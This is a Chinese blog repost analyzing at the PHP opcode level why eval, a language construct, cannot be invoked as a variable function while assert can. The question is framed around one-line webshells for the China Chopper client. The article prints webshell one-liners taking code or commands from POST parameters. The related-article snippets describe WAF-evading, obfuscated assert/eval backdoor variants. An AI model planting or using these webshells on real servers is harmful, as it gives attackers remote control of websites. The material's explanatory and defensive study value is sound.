从底层分析eval和assert的区别

最新推荐文章于 2023-03-28 03:00:00 发布
最新推荐文章于 2023-03-28 03:00:00 发布
阅读量460 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/iamstudy/articles/analysis_eval_and_assert.html
版权

经常会遇上这么一个问题

<?php
$_POST['1']($_POST['2']);

在菜刀中一般是1=assert&2做为密码连接,或者1=system&2=whoami来执行命令。

<?php
eval($_POST['2']);

看看熟悉的一句话,这个时候就会想,为啥不能这样1=eval&2连接。

$_POST['1']()这是一个可变函数,这意味着如果一个变量名后有圆括号,PHP 将寻找与变量的值同名的函数,并且尝试执行它。可变函数可以用来实现包括回调函数,函数表在内的一些用途。

但值得注意的是不能用于例如 echo,print,unset(),isset(),empty(),include,require 以及类似的语言结构

所以在看手册里面看eval函数就会发现有一行提示:

Note: 因为是一个++语言构造器++而不是一个函数,不能被可变函数调用。

结论就说到这,现在来验证一下。

eval.php

<?php
eval("system('whoami');");

assert.php

<?php
assert('system("whoami")');

804631-20160812183342578-1228382810.png

804631-20160812183355093-1358589994.png

可以很清楚的看到opcode,eval是INCLUDE_OR_EVAL去处理,而assert是用DO_FCALL去处理。

可以看下DO_FCALL
804631-20160812183427515-1474195187.png

会进行一个函数名的查找

再跟一下INCLUDE_OR_EVAL

804631-20160812183440765-1725908221.png

就会发现进去后会直接编译eval参数中的代码。

从一开始的跟踪opcode中可以看到,eval其实是Zend的函数,而assert是PHP_FUNCTION宏编写的,最后在调用上是不同的。

print与printf也一样,前者不是函数,而后者是的。

对于opcode的理解可以看看这篇文章

感谢ph师傅以及各位基友的指导。

参考资料:
ln-科普小文章php内核动态调试关于弱类型比较

转载于:https://www.cnblogs.com/iamstudy/articles/analysis_eval_and_assert.html

dengzhasong7076
关注
evalassert一句话木马分析
weixin_49472648的博客
07-23 2678
利用文件上传漏洞,往目标网站中上传一句话木马,然后你就可以在本地通过蚁剑等webshell工具即可获取和控制整个网站目录。 一般的php一句话后门很容易被网站防火墙waf拦截,而waf通常通过判断关键字来辨别一句话木马,要想绕过waf就需要对木马进行一些变形。............
PostgreSQL源码分析——UPDATE
让我思考一下
07-01 2848
本文主要描述SQL中UPDATE语句的源码分析,代码为PG13.3版本。以 这条最简单的Update语句进行源码分析(dtea不是分区表,不考虑并行等,没有建立任何索引),帮助我们理解update的大致流程。SQL流程如下:对应的代码: 解析部分——生成语法解析树UpdateStmt 关键数据结构:、、: 用户输入的update语句 由字符串会转为可由数据库理解的内部数据结构语法解析树 。执行逻辑在 中,需要理解flex与bison。gram.y中Update语法的定义: 解析部分——生成查询树Query
evalassert区别
天天学安全专属博客
03-28 757
evalassert区别
简述 asserteval区别
thj_blog
11-09 3364
       首先和大家说明,我所理解的也是在网上查询资料,总结下来的。我尽可能说的通俗易懂一些,看网上的资料,发现很多高大上的东西,我对PHP理解很浅,望大家批评指正。(我所理解的对于初学者够用了)        相同点:二者都可以执行PHP语句。只不过是,eval规范更加严格一些,必须符合PHP代码要求。而assert则没有那么严格,执行PHP表达式即可。并不是对assert无计可施,可以采...
一句话后门中evalassert区别
热门推荐
whatday的专栏
03-01 1万+
eval函数中参数是字符,如: eval('echo 1;'); assert函数中参数为表达式 (或者为函数),如: assert(phpinfo()) assert(eval('echo 1;')); 直接传递普通代码是无法执行的,如:assert('echo 1;'); 下面这个代码执行不了: @array_map("eval",arra
浅谈evalassert一句话木马执行区别
m0_46467017的博客
07-23 1532
一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数中变形,但本质是不变的木马的函数执行了我们发送的命令。
Node.js API详解之 Error模块用法实例分析
12-17
- `EvalError`: 在`eval()`执行失败时抛出。 - `SyntaxError`: 出现JavaScript语法错误时抛出。 - `RangeError`: 当数值超出预期范围时抛出。 - `ReferenceError`: 使用未定义的变量时抛出。 - `TypeError`: ...
Android 逆向分析大全
墨鱼菜鸡
07-11 3441
转载:Android 逆向分析大全:https://www.jianshu.com/p/a12d04fc748f 1. 概述 1.1 分析步骤 通用逆向分析步骤 1. 了解该模块正向编程相关方法2. 使用apktool解密apk,得到资源、jni模块等文件3. 从apk提取出dex文件,使用dex2jar转换成jar文件,再用java逆向工具...
Python协程的底层实现
El Psy Congroo
06-29 5591
生成器 协程的核心就是上下文切换,在Python中最简单的实现是用生成器 生成器有个方法 send() 可以从调用者向生成器函数发送数据,这样就可以在生成器中 yield future 表示要等待 future 的结果,然后把上下文切换到调用者,等 future 结果准备好后调用者再 send(future.result()) 给生成器发送结果,并把上下文切换到生成器函数 def gener...
Python2和Python3的区别
weixin_34971790的博客
05-02 297
一.学习Python2还是Python3? Python2 只维护到2020年。 Python官方都是建议直接学习Python3,Python3才是Python的未来。 实际上不管Python2还是Python3都要学习,一是公司业务需求,二是Python2和Python3确实有一些差异,但是,并没有想象的那么大。 学习Python前,先了解在Python3里面已经弃用的Python2语法。 二.编码 Python2中默认是ASCII编码,需要更改字符集才能正常支持中文,所以在我们使用的很多.py文件中
【WEB】从底层分析evalassert区别
HAPPY
08-19 418
https://www.cnblogs.com/iamstudy/articles/analysis_eval_and_assert.html
PHP evalassert
qq_40481505的博客
09-17 390
eval():函数把字符串按照 PHP 代码来计算,该字符串必须是合法的 PHP 代码,且必须以分号结尾。 如eval(“echo 1;”) assert():功能是判断一个表达式是否成立,返回true or false,重点是函数会执行此表达式。如果表达式为函数如assert(“echo(1)”),则会输出1,而如果 为assert(“echo 1;”)则不会有输出。 ...
php一句话客戶端,那些强悍的PHP一句话后门(3)
weixin_33957089的博客
03-16 273
三个变形的一句话PHP木马第一个在菜单里写http://site/1.php?2=assert密码是1第二个$_="";$_[+""]='';$_="$_"."";$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");?>在菜刀里写http://site/2.php?_=assert&__=eval($_POST['pass']) 密码是pass。如果你...
PHP木马
qq_41272376的博客
02-16 4776
PHP木马 一句话木马 可以在目标服务器上执行PHP代码,并和客户端(如菜刀,Cknife、冰蝎、蚁剑)进行交互的webshell,俗称小马。 多功能木马 根据PHP语法,编写较多代码,并在服务器上执行,完成所有功能的Webshell,俗称大马 逻辑木马 利用系统逻辑漏洞(如php uaf漏洞),绕过访问控制或执行特殊功能的WebShell PHP 可执行系统命令的函数 system string system ( string $command [, int &$return_var ] );
PHP变量函数(可变函数)
sinat_34463728的博客
04-09 477
PHP 支持可变函数的概念。这意味着如果一个变量名后有圆括号,PHP 将寻找与变量的值同名的函数,并且尝试执行它。可变函数可以用来实现包括回调函数,函数表在内的一些用途。可变函数不能用于例如 echo,print,unset(),isset(),empty(),include,require 以及类似的语言结构。需要使用自己的包装函数来将这些结构用作可变函数。 function fo
PHP常见面试题目深入解答分析(一)
Syu的杂货铺
02-12 2395
       高手请无视本文,骨灰们请直接绕行... :-)       本文旨在对网上流传很广的部份初/中级PHP开发工程师面试题目做出一些解答.并对这些面试题对面试者的测试意义,以及题目本身做一些较为深入的分析.      也许大量的初/中级PHPer们在面试的时候已经发现,许多公司的面试题目其实基本类似.:-),或许出题者本身并不清楚这些题目究竟要考验应聘
assert与if的区别(讲个小故事一下就明白了)
ylwdi的专栏
09-15 6411
记得我好像给小明说过:记住了,assert是在debug模式下才有效,它是一个用于调试的宏,除非你修改系统宏,我想吃饱了没事干才那样做。 今天: 我:小明,这是release版本要上线了,下面这两句代码是你写的?怎么没有if判断呢?   int* p = (int*)malloc(sizeof(int));    assert(p); 小明:哥,是我写得啊,assert不是也是用来判断的...
动态调用函数时的命令执行对于eval()和assert()的执行问题
Alexhirchi的博客
07-02 3448
前言 在做一道通过反序列化后动态调用函数的题目时,最后获取flag使用assertphpinfo() 构成的命令可以执行 但evalphpinfo()无法执行 ,本来以为只是因为assert可以把字符串参数当php代码执行,而eval是只能对合法的php代码可以执行的问题的原因,但这解释总感觉怪怪的,后来查询了一些文档并进行本地测试发现其另有原因。 附上题目中的主要代码: class HelloPhp { public $a; public $b; public func
``和$()的区别eval详解
honeyJ
07-05 3690
命令替换 在bash中,$( )与` `(反引号)都是用来作命令替换的。 命令替换与变量替换差不多,都是用来重组命令行的,先完成引号里的命令行,然后将其结果替换出来,再重组成新的命令行。 eg: $( )与`` 在操作上,这两者都是达到相应的效果,但是建议使用$( ),理由如下: ``很容易与”搞混乱,尤其对初学者来说。 在多层次的复合替换中,``必须要额外的转义字符处理(反...
eval和int区别
最新发布
05-24
`eval()` 和 `int()` 是 Python 中两个不同的函数,用途也不同。 `eval()` 函数可以将字符串作为 Python 代码进行执行。它会将字符串中的表达式求值,并返回结果。例如: ```python x = 2 y = 3 result = eval('x ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值